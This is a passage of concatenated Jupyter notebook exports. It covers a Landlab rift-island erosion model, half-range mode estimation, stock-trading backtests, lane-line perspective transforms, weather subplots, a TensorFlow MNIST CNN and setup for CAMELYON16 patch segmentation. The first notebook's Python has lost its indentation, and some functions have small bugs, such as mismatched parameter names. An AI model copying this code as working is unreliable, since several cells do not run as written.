depositionWe update the cumulative erosion/deposition by differencing the topography before and after this latest time step (because we copied the topography *after* doing tectonics and flexure, we include here only the effects of erosion and deposition). Updating crustal thicknessWe need to keep track of crustal thickness for the flexure calculations. Here we modify crustal thickness by adding/subtracting and deposition/erosion during this time step. Plotting and savingWe periodically pause to plot an image of the model to a file, and/or to save the run to a Landlab .grid file.
###Code
for i in range(1, num_iter + 1):
print(i)
# Tectonic extension & flexure
ke.run_one_step(dt) # update extensional subsidence
load[grid.core_nodes] = (unit_wt
* (thickness[grid.core_nodes]
- cum_subs[grid.core_nodes]))
fl.update() # update flexure
z[:] = (crust_datum + thickness
- (cum_subs + (deflection - init_deflection)))
# Adjust sea level
current_sea_level = sea_level_random(current_sea_level,
sea_level_delta)
print('Sea level = ' + str(current_sea_level) + ' m')
sea_level.append(current_sea_level)
subaerial[:] = z > current_sea_level
submarine = np.invert(subaerial)
# Remember previous topo
z0 = z.copy()
# Subaerial erosion
# a. make the submarine nodes open boundaries
grid.status_at_node[submarine] = grid.BC_NODE_IS_FIXED_VALUE
grid.status_at_node[subaerial] = grid.BC_NODE_IS_CORE
# b. route flow
fa.run_one_step()
# c. do some erosion
ed.run_one_step(dt)
# Submarine deposition
depo_rate = ed._qs_in / grid.area_of_cell[0]
z[submarine] += depo_rate[submarine] * dt
# Submarine diffusion
# a. make the submarine nodes core
grid.status_at_node[submarine] = grid.BC_NODE_IS_CORE
grid.status_at_node[perimeter_nodes] = grid.BC_NODE_IS_FIXED_VALUE
# b. diffuse
sd.sea_level = current_sea_level
sd.run_one_step(dt)
# Cumulative depo
cum_depo[grid.core_nodes] += z[grid.core_nodes] - z0[grid.core_nodes]
# Update crustal thickness
thickness[grid.core_nodes] += z[grid.core_nodes] - z0[grid.core_nodes]
# Plot
if i*dt >= next_plot:
frame_num += 1
plt.clf()
display_island(grid, current_sea_level, frame_num, ndigits)
next_plot += plot_interval
# Save
if i*dt >= next_save:
save_num += 1
this_save_name = (save_name
+ str(save_num).zfill(ndigits)
+ '.grid')
save_grid(grid, this_save_name, clobber=True)
next_save += save_interval
###Output
_____no_output_____
###Markdown
FinalizeHere we do some plotting of the model's state at the end of the run. Topography & bathymetryNote that bathymetry is cut off; colors indicating the deepest should be take as that deep OR DEEPER.
###Code
import cmocean
import datetime
area_threshold = 5e7
za = grid.at_node['topographic__elevation'] - current_sea_level
cscale = 1500.0
deep_water_scale = -cscale
river_scale = -0.5 * cscale
river = np.logical_and(
grid.at_node['drainage_area'] > area_threshold,
za > 0.0
)
za[river] = river_scale
za[za < deep_water_scale] = deep_water_scale
fa.run_one_step()
lake = np.logical_and(wse > z, za > 0.0)
za[lake] = river_scale
imshow_grid(grid, za, cmap=cmocean.cm.topo, vmin=-cscale,
vmax=cscale)
plt.axis(False)
figname = ('rift-island-t'
+ str(int(num_iter * dt))
+ '-'
+ datetime.date.today().strftime('%y%m%d')
+ '.pdf'
)
plt.savefig(figname)
###Output
_____no_output_____
###Markdown
Cumulative deposition/erosion
###Code
cdep = cum_depo.copy()
cdep[perimeter_nodes] = 0.0
dmax = np.amax(np.abs(cdep))
imshow_grid(grid, cdep, cmap='Spectral', vmin=-dmax, vmax=dmax)
plt.axis(False)
plt.savefig('cum_depo.png')
###Output
_____no_output_____
###Markdown
Sea-level history
###Code
plt.plot(0.001 * dt * np.arange(len(sea_level)), sea_level)
plt.xlabel('Time since start of run (ky)')
plt.ylabel('Sea level (m)')
plt.title('Sea level history')
plt.grid(True)
###Output
_____no_output_____
###Markdown
Cross-sectional profile
###Code
startnode = ((grid.number_of_node_rows // 2)
* grid.number_of_node_columns)
endnode = startnode + grid.number_of_node_columns
midrow = np.arange(startnode, endnode, dtype=int)
x = 0.001 * grid.spacing * np.arange(0.0, len(midrow))
plt.figure()
plt.plot(x, z[midrow] - np.maximum(cdep[midrow], 0.0),
'k:', label='Basement')
plt.plot(x, z[midrow], 'g', label='Surface')
plt.plot([0, max(x)],
[current_sea_level, current_sea_level],
label='Sea level'
)
plt.xlabel('Distance (km)')
plt.ylabel('Elevation (m)')
plt.legend()
plt.grid(True)
###Output
_____no_output_____
###Markdown
Flexure
###Code
net_flex = init_deflection - deflection
imshow_grid(flex_rast_grid, net_flex)
###Output
_____no_output_____ |
Half Range Mode Estimation.ipynb | ###Markdown
from scipy.stats import normimport matplotlib.pyplot as pltimport numpy as npimport math%matplotlib inline
###Code
beta = 0.5
# Example of [1,2,2,3,4]
def HRM(v, N):
#print()
#print("v", v)
#print('len(v)', len(v))
# Step 2
# If we only have 1 or 2 values, just return their mean
if N == 1 or N == 2:
return v.mean()
# Step 3
# calculate the interval width, this method gets it's name
# with a Beta of 0.5 or half-width. Other Beta values can
# be used for different effects
# This is half the width of the full range of data
w = beta*(v[-1]-v[0])
#print("w", w)
# Step 4
# Create N-1 intervals called I
# each interval is of w width
I=[]
for j in range(0, N-1): # j = 1 to N-1, paper is 1 based index
I.append((v[j], v[j]+w) )
I = np.array(I)
#print('I', I)
#print('len I', len(I))
# Step 4.5
# for each interval, determine how many values are in each interval
cnt = np.array([((rng[0] <= v) & (v <= rng[1])).sum() for rng in I])
N_prime = max(cnt)
#print('cnt', cnt)
#print('len(cnt)', len(cnt))
#print("N_prime", N_prime)
# Step 5
if (cnt == N_prime).sum() == 1:
J = I[np.where(cnt == N_prime)[0][0]]
v = v[np.logical_and(v>=J[0], v<=J[1])]
return HRM(v, len(v))
# Step 6
IJ = []
for Ii in I[cnt==N_prime]:
IJ.append(v[(Ii[0]<=v) & (v<=Ii[1])])
# Step 7
w_prime = np.ptp(IJ, axis=1).min()
# Step 8
Vmin = v[-1] # default to our array's min/max
Vmax = v[0]
for IJi in IJ:
if (IJi[-1]-IJi[0]) == w_prime:
if (IJi[0]<Vmin): Vmin = IJi[0]
if (IJi[-1]>Vmax): Vmax = IJi[-1]
# Step 9
min_index = np.argmax(v==Vmin)
v_back = v[::-1]
max_index = len(v)-np.argmax(v_back==Vmax)-1
N_prime_prime = max_index-min_index+1
# Step 10
v = v[min_index:max_index+1]
# Step 11
if N == N_prime_prime:
# this should not happen for continous data, but regardless we need to have a case for it
# Essentially this means that we did not progress this itteration
if (v[2]-v[1]) < (v[-1]-v[-2]):
v = v[:-1]
N_prime_prime = N_prime_prime - 1
elif (v[2]-v[1]) > (v[-1]-v[-2]):
v = v[1:]
N_prime_prime = N_prime_prime - 1
else:
v = v[1:-1]
N_prime_prime = N_prime_prime - 2
# Step 12
N = N_prime_prime
return HRM(v, N)
def graph(modal, numBins, title):
count, bins, ignored = plt.hist(modal, numBins)
modal.sort()
hrm = HRM(modal, len(modal))
mean=modal.mean()
median=np.median(modal)
handles=[]
handles.append(plt.axvline(x=hrm, color='fuchsia', label='Half-Range: {0:.2f}'.format(hrm)))
handles.append(plt.axvline(x=mean, color='y', label='Mean: {0:.2f}'.format(mean)))
handles.append(plt.axvline(x=median, color='g', label='Median: {0:.2f}'.format(median)))
plt.legend(handles=handles)
plt.title(title, {'fontsize': 20})
plt.show()
modal = np.random.normal(10, 3, 5000)
graph(modal, 40, 'Normal Distribution')
modal = np.random.exponential(2, 5000)
graph(modal, 40, 'Exponential Distribution')
modal1 = np.random.normal(10, 3, 2500)
modal2 = np.random.normal(20, 3, 2500)
modal = np.concatenate((modal1, modal2))
graph(modal, 40, 'Bi-Modal Distribution')
modal = np.random.lognormal(10, 0.7, 5000)
graph(modal, 40, 'Log Normal Distribution')
###Output
_____no_output_____ |
ipython/qa.ipynb | ###Markdown
7. 量化交易
###Code
data['close'].plot()
bors = data.loc['2016-07-01':]
k, b = calc.linear_regression_kb(bors['close'].values);
degree = np.rad2deg(k)
model, zoom_factor = calc.linear_regression_y(bors['close'].values, zoom=True)
k2 = model.params[1]
b2 = model.params[0]
degree2 = np.rad2deg(k2)
x = np.arange(0, bors['close'].shape[0])
reg_y_fit = x * k + b
reg_y_fit2 = x * k2 + b2
_, axes = plt.subplots(nrows=1, ncols=2, figsize=(20, 5))
axes[0].set_title(f"No zoom. degree={degree}")
axes[0].plot(x, bors['close'].values, '')
axes[0].plot(x, reg_y_fit, 'r')
axes[1].set_title(f"with zoom, degree={degree2}")
axes[1].plot(x, bors['close'].values, '')
axes[1].plot(x, reg_y_fit2/zoom_factor, 'r')
###Output
_____no_output_____
###Markdown
7.1 均值回复策略- train dataset是过去第二年的数据。- test dataset是过去一年的数据。
###Code
Y1=-252
train = data.iloc[Y1*2:Y1];train.head()
train.shape
test = data.iloc[Y1:];test.head()
test.shape
close_mean = train.close.mean()
close_std = train.close.std()
sell_signal = close_mean + close_std / 3
buy_signal = close_mean - close_std /3
plt.figure(figsize=(20,7))
plt.title(f"Train dataset: close_mean={close_mean}, close_std={close_std}")
train.close.plot()
plt.axhline(buy_signal, color='r', lw=3)
plt.axhline(close_mean, color='black', lw=1)
plt.axhline(sell_signal, color='g', lw=3)
plt.legend(['train close', f'buy signal({buy_signal})', f'close mean({close_mean})', f'sell signal({sell_signal})'],
loc='best')
plt.figure(figsize=(20,7))
plt.title(f"Test dataset: close_mean={close_mean}, close_std={close_std}")
test.close.plot()
plt.axhline(buy_signal, color='r', lw=3)
plt.axhline(close_mean, color='black', lw=1)
plt.axhline(sell_signal, color='g', lw=3)
plt.legend(['train close', f'buy signal({buy_signal})', f'close mean({close_mean})', f'sell signal({sell_signal})'],
loc='best')
test.loc[test['close'] <= buy_signal, 'signal'] = 1
test.loc[test['close'] >= sell_signal,'signal'] = 0
test['keep'] = test['signal']
test['keep'].fillna(method='ffill', inplace=True)
#test.loc['2017-03-01':'2017-05-01']
###Output
/opt/conda/lib/python3.6/site-packages/ipykernel_launcher.py:1: SettingWithCopyWarning:
A value is trying to be set on a copy of a slice from a DataFrame.
Try using .loc[row_indexer,col_indexer] = value instead
See the caveats in the documentation: http://pandas.pydata.org/pandas-docs/stable/indexing.html#indexing-view-versus-copy
"""Entry point for launching an IPython kernel.
/opt/conda/lib/python3.6/site-packages/pandas/core/generic.py:3191: SettingWithCopyWarning:
A value is trying to be set on a copy of a slice from a DataFrame
See the caveats in the documentation: http://pandas.pydata.org/pandas-docs/stable/indexing.html#indexing-view-versus-copy
self._update_inplace(new_data)
###Markdown
> benchmark_profit2 is to indicate benchmark_profit is correct.> we can use ***np.log(close / close.shift(1))*** to calculate profit
###Code
test['benchmark_profit'] = np.log(test['close'] / test['close'].shift(1))
test['benchmark_profit2'] = (test['close'] - test['close'].shift(1)) /test['close'].shift(1)
test[['benchmark_profit','benchmark_profit2']].plot(subplots=True, grid=True, figsize=(14,7))
test.head()
test['trend_profit'] = test['keep'] * test['benchmark_profit']
test['trend_profit'].plot(figsize=(20, 7))
#test.loc['2017-03-01':'2017-05-01']
test[['benchmark_profit', 'trend_profit']].cumsum().plot(grid=True, figsize=(20, 7))
###Output
_____no_output_____
###Markdown
> ***np.exp***显示了更好的投资回报率(1.2),而不是增长率
###Code
test[['benchmark_profit', 'trend_profit']].cumsum().apply(np.exp).plot(grid=True, figsize=(20, 7))
###Output
_____no_output_____
###Markdown
2. 趋势跟踪策略N1: N1天内的最高价格,为买入信号N2: N2天内的最低加个,为卖出信号N1>N2
###Code
N1=42
N2=21
test = data.loc['2016-06-1':]; test.head()
test['n1_high'] = test['high'].rolling(N1).max()
test['n2_low'] = test['low'].rolling(N2).min()
expan_max = test['close'].expanding().max()
expan_min = test['low'].expanding().min()
test['n1_high'].fillna(value=expan_max, inplace=True)
test['n2_low'].fillna(value=expan_min, inplace=True)
test.head()
test.loc[test['close']>test['n1_high'].shift(1), 'signal'] = 1
test.loc[test['close']<test['n2_low'].shift(1), 'signal'] = 0
test.head()
test['keep'] = test['signal'].shift(1)
test['keep'].fillna(method='ffill', inplace=True)
test['benchmark_profit'] = np.log(test['close']/test['close'].shift(1))
test['trend_profit'] = test['keep'] * test['benchmark_profit']
test[['benchmark_profit', 'trend_profit']].cumsum().apply(np.exp).plot(grid=True, figsize=(20, 7))
#test.loc['2016-10-15':'2016-11-15']
###Output
_____no_output_____ |
examples/03-PerspectiveTransform.ipynb | ###Markdown
Advanced Lane Finding ProjectThe goals / steps of this project are the following:* Compute the camera calibration matrix and distortion coefficients given a set of chessboard images.* Apply a distortion correction to raw images.* Use color transforms, gradients, etc., to create a thresholded binary image.* **Apply a perspective transform to rectify binary image ("birds-eye view").*** **Detect lane pixels and fit to find the lane boundary.*** **Determine the curvature of the lane and vehicle position with respect to center.*** **Warp the detected lane boundaries back onto the original image.*** **Output visual display of the lane boundaries and numerical estimation of lane curvature and vehicle position.**--- Apply a perspective transform to rectify binary image
###Code
import numpy as np
import cv2
import glob
import matplotlib.pyplot as plt
import pickle
%matplotlib inline
ym_per_pix = 30 / 720
xm_per_pix = 3.7 / 700
parameters = pickle.load(open('./camera_calibration_parameters', 'rb'))
mtx, dist = map(parameters.get, ('mtx', 'dist'))
def region_lines(origin_img, vertices):
img = origin_img.copy()
for i in range(vertices.shape[1]-1):
cv2.line(img, tuple(tuple(vertices[:, i])[0]), tuple(tuple(vertices[:, i+1])[0]), (0, 255, 0), 10)
cv2.line(img, tuple(tuple(vertices[:, vertices.shape[1]-1])[0]), tuple(tuple(vertices[:, 0])[0]), (0, 255, 0), 10)
return img
img = cv2.imread('../test_images/test3.jpg')
img = cv2.cvtColor(img, cv2.COLOR_BGR2RGB)
undist = cv2.undistort(img, mtx, dist, None, mtx)
imshape = undist.shape
vertices = np.array([[(200, imshape[0]), (imshape[1]/2-40, imshape[0]*.6),
(imshape[1]/2+40, imshape[0]*.6), (1200, imshape[0])]], dtype=np.float32)
img_with_region_lines = region_lines(img, vertices)
plt.imshow(img_with_region_lines)
plt.imshow(img)
gray = cv2.cvtColor(undist, cv2.COLOR_BGR2GRAY)
src = vertices
X, Y = imshape[1], imshape[0]
offset = 200
dst = np.float32([
(offset, Y),
(offset, 0),
(X-offset, 0),
(X-offset, Y)
])
print (src)
print (dst)
def bird_eye(img, src, dist):
h, w = img.shape[:2]
M = cv2.getPerspectiveTransform(src, dst)
Minv = cv2.getPerspectiveTransform(dst, src)
warped = cv2.warpPerspective(img, M, (w, h), flags=cv2.INTER_LINEAR)
return warped, M, Minv
binary_warped, M, Minv = bird_eye(undist, src, dst)
#plt.imshow(binary_warped)
cv2.line(binary_warped, (200, 720), (200, 0), (0, 255, 0), 10)
cv2.line(binary_warped, (1080, 720), (1080, 0), (0, 255, 0), 10)
plt.imshow(binary_warped, cmap='gray')
fig, (ax1, ax2) = plt.subplots(1, 2, figsize=(20, 10))
ax1.imshow(img_with_region_lines)
ax1.set_title('Undistorted Image with source points drawn')
ax2.imshow(binary_warped, cmap='gray')
ax2.set_title('Warped result with destination points drawn')
plt.savefig('warped_binary.jpg')
###Output
_____no_output_____
###Markdown
detect lane pixels
###Code
def find_lane_pixels(binary_warped):
histogram = np.sum(binary_warped[binary_warped.shape[0]//2:, :], axis=0)
out_img = np.dstack((binary_warped, binary_warped, binary_warped))
midpoint = np.int(histogram.shape[0]//2)
leftx_base = np.argmax(histogram[:midpoint])
rightx_base = np.argmax(histogram[midpoint:]) + midpoint
nwindows = 9
margin = 100
minpix = 50
window_height = np.int(binary_warped.shape[0]//nwindows)
nonzero = binary_warped.nonzero()
nonzeroy = np.array(nonzero[0])
nonzerox = np.array(nonzero[1])
leftx_current = leftx_base
rightx_current = rightx_base
left_lane_inds = []
right_lane_inds = []
for window in range(nwindows):
win_y_low = binary_warped.shape[0] - (window + 1)*window_height
win_y_high = binary_warped.shape[0] - window*window_height
win_xleft_low = leftx_current - margin
win_xleft_high = leftx_current + margin
win_xright_low = rightx_current - margin
win_xright_high = rightx_current + margin
cv2.rectangle(out_img, (win_xleft_low, win_y_low), (win_xleft_high, win_y_high), (0, 255, 0), 2)
cv2.rectangle(out_img, (win_xright_low, win_y_low), (win_xright_high, win_y_high), (0, 255, 0), 2)
good_left_inds = ((nonzeroy >= win_y_low) & (nonzeroy < win_y_high) &
(nonzerox >= win_xleft_low) & (nonzerox < win_xleft_high)).nonzero()[0]
good_right_inds = ((nonzeroy >= win_y_low) & (nonzeroy < win_y_high) & (nonzerox >= win_xright_low) & (nonzerox < win_xright_high)).nonzero()[0]
left_lane_inds.append(good_left_inds)
right_lane_inds.append(good_right_inds)
if len(good_left_inds) > minpix:
leftx_current = np.int(np.mean(nonzerox[good_left_inds]))
if len(good_right_inds) > minpix:
rightx_current = np.int(np.mean(nonzerox[good_right_inds]))
try:
left_lane_inds = np.concatenate(left_lane_inds)
right_lane_inds = np.concatenate(right_lane_inds)
except ValueError:
pass
leftx = nonzerox[left_lane_inds]
lefty = nonzeroy[left_lane_inds]
rightx = nonzerox[right_lane_inds]
righty = nonzeroy[right_lane_inds]
return leftx, lefty, rightx, righty, out_img
def fit_polynomial(binary_warped):
leftx, lefty, rightx, righty, out_img = find_lane_pixels(binary_warped)
left_fit = np.polyfit(lefty, leftx, 2)
right_fit = np.polyfit(righty, rightx, 2)
ploty = np.linspace(0, binary_warped.shape[0]-1, binary_warped.shape[0])
try:
left_fitx = left_fit[0]*ploty**2 + left_fit[1]*ploty + left_fit[2]
right_fitx = right_fit[0]*ploty**2 + right_fit[1]*ploty + right_fit[2]
except TypeError:
print('The function failed to fit a line!')
left_fitx = 1 * ploty ** 2 + 1 * ploty
right_fitx = 1 * ploty ** 2 + 1 * ploty
out_img[lefty, leftx] = [255, 0, 0]
out_img[righty, rightx] = [0, 0, 255]
plt.plot(left_fitx, ploty, color='yellow')
plt.plot(right_fitx, ploty, color='yellow')
# Fit a second order polynomial to each
left_fit_m = np.polyfit(lefty*ym_per_pix, leftx*xm_per_pix, 2)
right_fit_m = np.polyfit(righty*ym_per_pix, rightx*xm_per_pix, 2)
return out_img, left_fit, right_fit, left_fit_m, right_fit_m, ploty
def space_thresh(img, thresh_min, thresh_max):
binary = np.zeros_like(img)
binary[(img >= thresh_min) & (img <= thresh_max)] = 1
return binary
def abs_sobel_thresh(img, orient='x', thresh_min=0, thresh_max=255):
gray = cv2.cvtColor(img, cv2.COLOR_RGB2GRAY)
sobelx = cv2.Sobel(gray, cv2.CV_64F, 1, 0)
sobely = cv2.Sobel(gray, cv2.CV_64F, 0, 1)
abs_sobelx = np.absolute(sobelx)
abs_sobely = np.absolute(sobely)
scaled_sobel = 0
if orient == 'x':
scaled_sobel = np.uint8(255*abs_sobelx/np.max(abs_sobelx))
elif orient == 'y':
scaled_sobel = np.uint8(255*abs_sobely/np.max(abs_sobely))
sxbinary = np.zeros_like(scaled_sobel)
sxbinary[(scaled_sobel >= thresh_min) & (scaled_sobel <= thresh_max)] = 1
binary_output = np.copy(sxbinary)
return binary_output
sobelx_img = abs_sobel_thresh(binary_warped, 'x', 10, 100)
plt.imshow(sobelx_img, cmap='gray')
hls_image = cv2.cvtColor(binary_warped, cv2.COLOR_BGR2HLS)
s_binary = space_thresh(hls_image[:, :, 2], 80, 255)
#plt.imshow(s_binary, cmap='gray')
out_img, left_fit, right_fit, left_fit_m, right_fit_m, proty = fit_polynomial(sobelx_img)
plt.imshow(out_img)
###Output
_____no_output_____
###Markdown
Determine the curvature of the lane and vehicle position with respect to center.
###Code
def calc_curve(ym, left_fit_cr, right_fit_cr, ploty):
# Calculation of R_curve (radius of curvature)
ym_per_pix = 30/ym
y_eval = np.max(ploty)
left_curverad = ((1 + (2*left_fit_cr[0]*y_eval*ym_per_pix + left_fit_cr[1])**2)**1.5) / np.absolute(2*left_fit_cr[0])
right_curverad = ((1 + (2*right_fit_cr[0]*y_eval*ym_per_pix + right_fit_cr[1])**2)**1.5) / np.absolute(2*right_fit_cr[0])
return left_curverad / 1000, right_curverad / 1000
print(calc_curve(719, left_fit_m, right_fit_m, proty))
###Output
_____no_output_____
###Markdown
Output visual display of the lane boundaries and numerical estimation of lane curvature and vehicle position.
###Code
def draw_line(img, left_fit, right_fit, left_fit_m, right_fit_m, plot):
y_max = img.shape[0]
ploty = np.linspace(0, y_max - 1, y_max)
color_warp = np.zeros_like(img).astype(np.uint8)
left_fitx = left_fit[0] * ploty ** 2 + left_fit[1]*ploty + left_fit[2]
right_fitx = right_fit[0] * ploty ** 2 + right_fit[1]*ploty + right_fit[2]
vehicle_center = img.shape[1] * xm_per_pix / 2
#middle = left_fitx + (right_fitx - left_fitx)/2
line_left = left_fit_m[0] * y_max * ym_per_pix ** 2 + left_fit_m[1] * y_max * ym_per_pix + left_fit_m[2]
line_right = right_fit_m[0] * y_max * ym_per_pix** 2 + right_fit_m[1] * y_max * ym_per_pix + right_fit_m[2]
middle = (line_right + line_left)/2
dist_from_center = middle - vehicle_center
if dist_from_center > 0:
message = '{:.2f} m right of center'.format(dist_from_center)
else:
message = '{:.2f} m left of center'.format(-1*dist_from_center)
left, right = calc_curve(719, left_fit_m, right_fit_m, plot)
# Recast the x and y points into usable format for cv2.fillPoly()
pts_left = np.array([np.transpose(np.vstack([left_fitx, ploty]))])
pts_right = np.array([np.flipud(np.transpose(np.vstack([right_fitx, ploty])))])
pts = np.hstack((pts_left, pts_right))
# Draw the lane onto the warped blank image
cv2.fillPoly(color_warp, np.int_([pts]), (0,255, 0))
# Warp the blank back to original image space using inverse perspective matrix (Minv)
newwarp = cv2.warpPerspective(color_warp, Minv, (img.shape[1], img.shape[0]))
font = cv2.FONT_HERSHEY_SIMPLEX
fontColor = (255, 255, 255)
cv2.putText(img, 'Left curvature: {:.2f} km'.format(left), (50, 50), font, 2, fontColor, 2)
cv2.putText(img, 'Right curvature: {:.2f} km'.format(right), (50, 120), font, 2, fontColor, 2)
cv2.putText(img, 'Vehicle is {} '.format(message), (50, 190), font, 2, fontColor, 2)
return cv2.addWeighted(img, 1, newwarp, 0.3, 0)
output = draw_line(img, left_fit, right_fit, left_fit_m, right_fit_m, img.shape[0]*30/719)
plt.imshow(output)
###Output
_____no_output_____ |
General/Subplots and Shared Axes.ipynb | ###Markdown
Subplots and Shared Axes
###Code
%matplotlib notebook
import pandas as pd
import numpy as np
import matplotlib.pyplot as plt
df = pd.read_csv('weather.csv')
df.head()
days = df[df['MONTH'].isin([1,7]) & (df['DAY'] == 1)].drop(columns='DAY')
days = days.pivot(columns='MONTH',index='TIME')
days.head()
fig, ax = plt.subplots(2,2, sharey='row', sharex='col')
days['TEMP'].plot(subplots=True, ax=ax[0], legend=False)
days['PRESSURE'].plot(subplots=True, ax=ax[1], legend=False);
ax[0][0].set_ylabel("Temperature")
ax[0][0].set_title("January")
ax[0][1].set_title("July")
ax[1][0].set_ylabel("Pressure")
ax[1][0].set_xlabel("Time")
ax[1][1].set_xlabel("Time")
fig.tight_layout()
###Output
_____no_output_____ |
Lectures/Lecture-10/TensorFlow-Examples/3_NeuralNetworks/convolutional_network.ipynb | ###Markdown
Convolutional Neural Network ExampleBuild a convolutional neural network with TensorFlow.This example is using TensorFlow layers API, see 'convolutional_network_raw' examplefor a raw TensorFlow implementation with variables.- Author: Aymeric Damien- Project: https://github.com/aymericdamien/TensorFlow-Examples/ CNN Overview MNIST Dataset OverviewThis example is using MNIST handwritten digits. The dataset contains 60,000 examples for training and 10,000 examples for testing. The digits have been size-normalized and centered in a fixed-size image (28x28 pixels) with values from 0 to 1. For simplicity, each image has been flattened and converted to a 1-D numpy array of 784 features (28*28).More info: http://yann.lecun.com/exdb/mnist/
###Code
from __future__ import division, print_function, absolute_import
# Import MNIST data
from tensorflow.examples.tutorials.mnist import input_data
mnist = input_data.read_data_sets("/tmp/data/", one_hot=False)
import tensorflow as tf
import matplotlib.pyplot as plt
import numpy as np
# Training Parameters
learning_rate = 0.001
num_steps = 2000
batch_size = 128
# Network Parameters
num_input = 784 # MNIST data input (img shape: 28*28)
num_classes = 10 # MNIST total classes (0-9 digits)
dropout = 0.25 # Dropout, probability to drop a unit
# Create the neural network
def conv_net(x_dict, n_classes, dropout, reuse, is_training):
# Define a scope for reusing the variables
with tf.variable_scope('ConvNet', reuse=reuse):
# TF Estimator input is a dict, in case of multiple inputs
x = x_dict['images']
# MNIST data input is a 1-D vector of 784 features (28*28 pixels)
# Reshape to match picture format [Height x Width x Channel]
# Tensor input become 4-D: [Batch Size, Height, Width, Channel]
x = tf.reshape(x, shape=[-1, 28, 28, 1])
# Convolution Layer with 32 filters and a kernel size of 5
conv1 = tf.layers.conv2d(x, 32, 5, activation=tf.nn.relu)
# Max Pooling (down-sampling) with strides of 2 and kernel size of 2
conv1 = tf.layers.max_pooling2d(conv1, 2, 2)
# Convolution Layer with 64 filters and a kernel size of 3
conv2 = tf.layers.conv2d(conv1, 64, 3, activation=tf.nn.relu)
# Max Pooling (down-sampling) with strides of 2 and kernel size of 2
conv2 = tf.layers.max_pooling2d(conv2, 2, 2)
# Flatten the data to a 1-D vector for the fully connected layer
fc1 = tf.contrib.layers.flatten(conv2)
# Fully connected layer (in tf contrib folder for now)
fc1 = tf.layers.dense(fc1, 1024)
# Apply Dropout (if is_training is False, dropout is not applied)
fc1 = tf.layers.dropout(fc1, rate=dropout, training=is_training)
# Output layer, class prediction
out = tf.layers.dense(fc1, n_classes)
return out
# Define the model function (following TF Estimator Template)
def model_fn(features, labels, mode):
# Build the neural network
# Because Dropout have different behavior at training and prediction time, we
# need to create 2 distinct computation graphs that still share the same weights.
logits_train = conv_net(features, num_classes, dropout, reuse=False, is_training=True)
logits_test = conv_net(features, num_classes, dropout, reuse=True, is_training=False)
# Predictions
pred_classes = tf.argmax(logits_test, axis=1)
pred_probas = tf.nn.softmax(logits_test)
# If prediction mode, early return
if mode == tf.estimator.ModeKeys.PREDICT:
return tf.estimator.EstimatorSpec(mode, predictions=pred_classes)
# Define loss and optimizer
loss_op = tf.reduce_mean(tf.nn.sparse_softmax_cross_entropy_with_logits(
logits=logits_train, labels=tf.cast(labels, dtype=tf.int32)))
optimizer = tf.train.AdamOptimizer(learning_rate=learning_rate)
train_op = optimizer.minimize(loss_op, global_step=tf.train.get_global_step())
# Evaluate the accuracy of the model
acc_op = tf.metrics.accuracy(labels=labels, predictions=pred_classes)
# TF Estimators requires to return a EstimatorSpec, that specify
# the different ops for training, evaluating, ...
estim_specs = tf.estimator.EstimatorSpec(
mode=mode,
predictions=pred_classes,
loss=loss_op,
train_op=train_op,
eval_metric_ops={'accuracy': acc_op})
return estim_specs
# Build the Estimator
model = tf.estimator.Estimator(model_fn)
# Define the input function for training
input_fn = tf.estimator.inputs.numpy_input_fn(
x={'images': mnist.train.images}, y=mnist.train.labels,
batch_size=batch_size, num_epochs=None, shuffle=True)
# Train the Model
model.train(input_fn, steps=num_steps)
# Evaluate the Model
# Define the input function for evaluating
input_fn = tf.estimator.inputs.numpy_input_fn(
x={'images': mnist.test.images}, y=mnist.test.labels,
batch_size=batch_size, shuffle=False)
# Use the Estimator 'evaluate' method
model.evaluate(input_fn)
# Predict single images
n_images = 4
# Get images from test set
test_images = mnist.test.images[:n_images]
# Prepare the input data
input_fn = tf.estimator.inputs.numpy_input_fn(
x={'images': test_images}, shuffle=False)
# Use the model to predict the images class
preds = list(model.predict(input_fn))
# Display
for i in range(n_images):
plt.imshow(np.reshape(test_images[i], [28, 28]), cmap='gray')
plt.show()
print("Model prediction:", preds[i])
###Output
INFO:tensorflow:Restoring parameters from /tmp/tmpdhd6F4/model.ckpt-2000
|
notebooks/RFSegmentation.ipynb | ###Markdown
Patch stuff
###Code
wsi = '/Z/personal-folders/interns/saket/histopath_data/CAMELYON16/training/tumor/tumor_005.tif'
json_filepath = '/Z/personal-folders/interns/saket/histopath_data/CAMELYON16/training/lesion_annotations_json/tumor_005.json'
savedir = '/Z/personal-folders/interns/saket/github/pyvirchow/data/wsi_heatmap_rf/'
os.makedirs(savedir, exist_ok=True)
img_mask_dir = '/Z/personal-folders/interns/saket/github/pyvirchow/data/patch_img_and_mask/'
basename = path_leaf(wsi).replace('.tif', '')
#if basename!= 'tumor_110':
# continue
patchsize = 256
saveto = os.path.join(savedir, basename + '.joblib.pickle')
saveto_original = os.path.join(savedir,
basename + '.original.joblib.pickle')
all_samples = pd.read_table('/Z/personal-folders/interns/saket/github/pyvirchow/data/patch_df/tumor_005.tsv')
if 'img_path' not in all_samples.columns:
assert img_mask_dir is not None, 'Need to provide directory if img_path column is missing'
tile_loc = all_samples.tile_loc.astype(str)
tile_loc = tile_loc.str.replace(' ', '').str.replace(
')', '').str.replace('(', '')
all_samples[['row', 'col']] = tile_loc.str.split(',', expand=True)
all_samples['img_path'] = img_mask_dir + '/' + all_samples[[
'uid', 'row', 'col'
]].apply(
lambda x: '_'.join(x.values.tolist()),
axis=1) + '.img.joblib.pickle'
all_samples['mask_path'] = img_mask_dir + '/' + all_samples[[
'uid', 'row', 'col'
]].apply(
lambda x: '_'.join(x.values.tolist()),
axis=1) + '.mask.joblib.pickle'
if not os.path.isfile('/tmp/white.img.pickle'):
white_img = np.ones(
[patchsize, patchsize, 3], dtype=np.uint8) * 255
joblib.dump(white_img, '/tmp/white.img.pickle')
# Definitely not a tumor and hence all black
if not os.path.isfile('/tmp/white.mask.pickle'):
white_img_mask = np.ones(
[patchsize, patchsize], dtype=np.uint8) * 0
joblib.dump(white_img_mask, '/tmp/white.mask.pickle')
all_samples.loc[all_samples.is_tissue == False,
'img_path'] = '/tmp/white.img.pickle'
all_samples.loc[all_samples.is_tissue == False,
'mask_path'] = '/tmp/white.mask.pickle'
for idx, row in all_samples.iterrows():
f = row['img_path']
if not os.path.isfile(f):
row['savedir'] = img_mask_dir
row['patch_size'] = patchsize
row['index'] = idx
save_images_and_mask(row)
print(all_samples.head())
all_samples.to_csv('/Z/personal-folders/interns/saket/github/pyvirchow/data/patch_df/tumor_005_with_mask.tsv',
index=False,
header=True, sep='\t')
testing_init_op, testing_next_batch = input_fn(['/Z/personal-folders/interns/saket/github/pyvirchow/data/patch_df/tumor_005_with_mask_segmented.tsv'],
batch_size)
